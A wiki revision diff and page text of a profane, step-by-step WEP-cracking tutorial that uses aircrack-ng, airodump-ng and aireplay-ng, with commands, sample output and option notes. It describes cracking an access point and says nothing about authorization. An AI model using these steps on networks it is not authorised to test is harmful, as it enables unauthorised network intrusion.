|
Size: 4814
Comment:
|
← Revision 7 as of 2018-09-14 10:16:02 ⇥
Size: 4818
Comment:
|
| Deletions are marked like this. | Additions are marked like this. |
| Line 7: | Line 7: |
| Ho scritto questo HOWTO perche' stanco di perdere tempo a leggere cazzate in rete. TUTTI i documenti che in teoria dovrebbero spiegare come crackare una rete WEP, nella realta' non spiegano UN CAZZO DI NIENTE, rimandando a pagine di manuali, facendo esempi senza alcuna spiegazione, o rimandando a pagine di help per le spiegazioni. E STI CAZZI, se mi rimandi alle pagine di manuale, tutto e', fuorche' un HOWTO! | I wrote this HOWTO because I was sick and tired of all that online shit. Every fuckin'document that state to explain how to crack a fracking WEP, really don't explain a SINGLE FUCK, linking other manual pages, making unuseful and unexplained examples also linking other incomplete help pages. So you know what? FUCK YOU, if you wrote a piece of SHIT called HOWTO and you link help pages, well, that's not a HOWTO, THAT'S A FUCKING STEAMING PILE OF BLOODY SHIT. |
| Line 9: | Line 9: |
| Grazie a lechuck senza il quale io non avrei concluso un cazzo di niente. | Thanks to Lechuck, without him this work will not be ever possible :) |
| Line 11: | Line 11: |
| Seguendo passo passo questo documento, invece, SI OTTENGONO RISULTATI, SUBITO, PRESTO E BENE. | So, this is an HOWTO: if you follow this document STEP BY STEP, you OBTAIN RESULTS, NOW. |
| Line 13: | Line 13: |
| == Cose da installare == | == What to install == |
| Line 15: | Line 15: |
| Ovviamente serve la suite di aircrack, che ora si chiama aircrack-ng solamente perche' il vecchio aircrack non viene piu' sviluppato. Ora, potremmo parlare ore sul fatto che ste teste di cazzo potevano tranquillamente SBATTERSENE LE PALLE ed evitare di aggiungere sto PORCODIO di -ng ad ogni cazzo di comando: MA CHE GRAN ROTTURA DI PALLE!!! | Obviously you need the aircrack suite, now called ''aircrack-ng'' only because the old aircrack is no more developed. WHAT - THE - FUCK. I don't get why in THE HELL the fucking developers have renamed it instead of GIVING AN ACTUAL FUCK and call the new project exactly as the old one! So: |
| Line 21: | Line 23: |
| == Settiamo la scheda == | == Setup your newtork card == |
| Line 23: | Line 25: |
| Basta lanciare il comando apposito: | Assumint that your wifi card is wlan0, just use |
| Line 26: | Line 28: |
| root@lem:~# airmon-ng start wlan0 1 | airmon-ng start wlan0 1 |
| Line 29: | Line 31: |
| cosi lui attiva mon0. Eventualmente, ti dice che ci sono dei processi che scassano il cazzo, come quelle cagate avahi, networkmanager, eccetera. Vanno KILLATE senza pieta'. Non serve rilanciare airmon-ng. | so you have just activated the mon0 interface. Sometime you will get some warning messages about some daemons interfering and creating problems, shit like avahi, networkmanager, and other unuseful shit. KILL THEM ALL. You don't need to re-run airmon-ng. |
| Line 31: | Line 33: |
| == Dati di fatto == | == Facts == |
| Line 33: | Line 35: |
| Assumiamo che l'ap sia Diolink-22334455 con mac address (bssid) AP:AP:AP:AP:AP:AP | Assuming the WEP AP to crack is called Diolink-22334455 with a MAC address (bssid) AP:AP:AP:AP:AP:AP |
| Line 35: | Line 37: |
| MAC Address della mia scheda di rete sul portatile: IO:IO:IO:IO:IO:IO | And my wlan0 address is: IO:IO:IO:IO:IO:IO |
| Line 38: | Line 40: |
| == PRIMO: Lanciamo il dump dei dati == | == FIRST: let's dump some data == |
| Line 44: | Line 46: |
| == SECONDO: aireplay #1 == | == SECOND: aireplay #1 == |
| Line 46: | Line 48: |
| SPOSTIAMOCI SU UNA SECONDA SHELL: | Open another shell: |
| Line 50: | Line 52: |
| }}} | |
| Line 51: | Line 54: |
| You will get something like {{{ |
|
| Line 60: | Line 66: |
| FANTASTICO, vuol dire che autentica. ora lanciamo un | FUCKING GOOD, it means you can autenticate. Now launch |
| Line 64: | Line 70: |
| }}} | |
| Line 65: | Line 72: |
| root@lem:~# aireplay-ng -3 -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0 | U get something like {{{ |
| Line 72: | Line 81: |
| Il numero di pacchetti aumenta sempre. 0 arp e' male. quindi passiamo alla terza fase | Packet number begin to raise. 0 arp is BAD. so let's move on the third phase. |
| Line 74: | Line 83: |
| == TERZO: altro aireplay == | == THIRD: another aireplay == |
| Line 76: | Line 85: |
| DA UNA TERZA SHELL RIPROVIAMO nel frattempo ad autenticarci, lasciando girare le altre 2: | Open a third shell, we can try to autenticate, while the 2 other shells are running: |
| Line 82: | Line 92: |
| se crea degli ARP, bene!. se crea solo degli ACK, non servono... quindi fanculo, restiamo sulla terza shell e diamo |
If this create some ARP, well, that's GREAT! if this create only ACK, they're not useful so fuck them all. Again on the third shell, we can try |
| Line 89: | Line 99: |
| Questo e' il modo iterattivo di aireplay; genera pacchetti appositi con cui fare merda. In teoria dovresti dirgli Y al pacchetto che crea solo se e' lungo 68 o 86. lui legge pacchetti, ci riflette e crea. |
This is aireplay interactive mode: it forge packets to DO SHIT. In theory, you must say Y to the forged packet only if it's lenght is 68 or 86. He read the packets, reflect, does some magic and create. |
| Line 92: | Line 101: |
| 68 = grandezza in byte di un arp di client wifi, 86 invece wired. | 68 = lenght of a wifi client ARP. 86 for wired. |
| Line 94: | Line 103: |
| ne da uno a 76, ci provo: do y. | BUT I DON'T GIVE A FUCK, he gave me a 76, and I SAY FUCK YES! |
| Line 96: | Line 105: |
| dopo un po provo un | after a while, I try |
| Line 99: | Line 108: |
| aircrack-ng nomedelfile.dump | aircrack-ng filename.dump |
| Line 102: | Line 111: |
| ed ecco SETTANTASEIMILA IV !!!!! E PARTE A CRACKARE!!! |
And here they are, 76000 IV !!!!! LET'S START THE CRACKING PARTY! |
| Line 105: | Line 114: |
| lui sotto al culo si vede crescere il file, quando da failed, ricomincia perche se ne trova sempre di piu'... | He's pumping behind! He see the file still increasing, when a "failed" come out, he simply restart... |
| Line 107: | Line 116: |
| E' FATTA, PRIMA O POI INCULA. | IS DONE. JUST A MATTER OF TIME. |
| Line 109: | Line 118: |
| == IL CRACKONE == | == THE BIG DEAL == |
| Line 115: | Line 124: |
| -s mostra l'ascii. -K serve, giocando con -f si cracka al 100%. | -s show ascii. -K is useful, playing with f you can crack 100%. |
| Line 117: | Line 126: |
| con -f 4 mi ha trovato la key desiderata. -b va specificato perche' altrimenti e' male. |
with -f 4 I found the key. ;) -b must be specified, if not, BAD SHIT HAPPENS. |
| Line 121: | Line 131: |
| == appunti == | == Scratchpad == |
| Line 126: | Line 136: |
| -k e' un algoritmo per crackare dal man di aircrack: |
-k is a cracking algorithm: |
| Line 141: | Line 149: |
| in alcuni casi (tipo al**ce adsl :) conviene usare -z che se non si cracca con >1 milione di IV e' perche' gli algoritmi di default falliscono [lobo] |
On some cases (AKA al**ce adsl :) you want to use -z (sometime you can't crack it with >1 millions IV - that's because default algo fails) [lobo] |
WEP Cracking HOWTO
by asbesto && lechuck
I wrote this HOWTO because I was sick and tired of all that online shit. Every fuckin'document that state to explain how to crack a fracking WEP, really don't explain a SINGLE FUCK, linking other manual pages, making unuseful and unexplained examples also linking other incomplete help pages. So you know what? FUCK YOU, if you wrote a piece of SHIT called HOWTO and you link help pages, well, that's not a HOWTO, THAT'S A FUCKING STEAMING PILE OF BLOODY SHIT.
Thanks to Lechuck, without him this work will not be ever possible 
So, this is an HOWTO: if you follow this document STEP BY STEP, you OBTAIN RESULTS, NOW.
What to install
Obviously you need the aircrack suite, now called aircrack-ng only because the old aircrack is no more developed. WHAT - THE - FUCK. I don't get why in THE HELL the fucking developers have renamed it instead of GIVING AN ACTUAL FUCK and call the new project exactly as the old one!
So:
sudo apt-get install aircrack-ng
Setup your newtork card
Assumint that your wifi card is wlan0, just use
airmon-ng start wlan0 1
so you have just activated the mon0 interface. Sometime you will get some warning messages about some daemons interfering and creating problems, shit like avahi, networkmanager, and other unuseful shit. KILL THEM ALL. You don't need to re-run airmon-ng.
Facts
Assuming the WEP AP to crack is called Diolink-22334455 with a MAC address (bssid) AP:AP:AP:AP:AP:AP
And my wlan0 address is: IO:IO:IO:IO:IO:IO
FIRST: let's dump some data
airodump-ng -c 1 -b AP:AP:AP:AP:AP:AP -t wep -w output.cap mon0
SECOND: aireplay #1
Open another shell:
aireplay-ng -1 0 -e Diolink-22334455 -a AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
You will get something like
16:55:37 Waiting for beacon frame (BSSID: AP:AP:AP:AP:AP:AP) on channel 1 16:55:37 Sending Authentication Request (Open System) 16:55:37 Authentication successful 16:55:37 Sending Association Request 16:55:37 Association successful :-) (AID: 1) root@lem:~#
FUCKING GOOD, it means you can autenticate. Now launch
aireplay-ng -3 -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
U get something like
16:57:27 Waiting for beacon frame (BSSID: AP:AP:AP:AP:AP:AP) on channel 1 Saving ARP requests in replay_arp-0629-165727.cap You should also start airodump-ng to capture replies. Read 1427 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
Packet number begin to raise. 0 arp is BAD. so let's move on the third phase.
THIRD: another aireplay
Open a third shell, we can try to autenticate, while the 2 other shells are running:
aireplay-ng -1 0 -e Diolink-22334455 -a AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
If this create some ARP, well, that's GREAT! if this create only ACK, they're not useful so fuck them all. Again on the third shell, we can try
aireplay-ng -2 -p 0841 -m 68 -n 86 -c FF:FF:FF:FF:FF:FF -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
This is aireplay interactive mode: it forge packets to DO SHIT. In theory, you must say Y to the forged packet only if it's lenght is 68 or 86. He read the packets, reflect, does some magic and create.
68 = lenght of a wifi client ARP. 86 for wired.
BUT I DON'T GIVE A FUCK, he gave me a 76, and I SAY FUCK YES!
after a while, I try
aircrack-ng filename.dump
And here they are, 76000 IV !!!!! LET'S START THE CRACKING PARTY!
He's pumping behind! He see the file still increasing, when a "failed" come out, he simply restart...
IS DONE. JUST A MATTER OF TIME.
THE BIG DEAL
aircrack-ng -K -M 4981430 -f 3 -b 00:25:53:1A:AB:B4 -s output.cap-01.cap
-s show ascii. -K is useful, playing with f you can crack 100%.
with -f 4 I found the key. 
-b must be specified, if not, BAD SHIT HAPPENS.
Scratchpad
aircrack-ng -K file.dump o file.ivs -k is a cracking algorithm: -k <korek> There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively. -y This is an experimental single brute-force attack which should only be used when the standard attack mode fails with more than one million IVs. -z Uses PTW (Andrei Pyshkin, Erik Tews and Ralf-Philipp Weinmann) attack. On some cases (AKA al**ce adsl :) you want to use -z (sometime you can't crack it with >1 millions IV - that's because default algo fails) [lobo]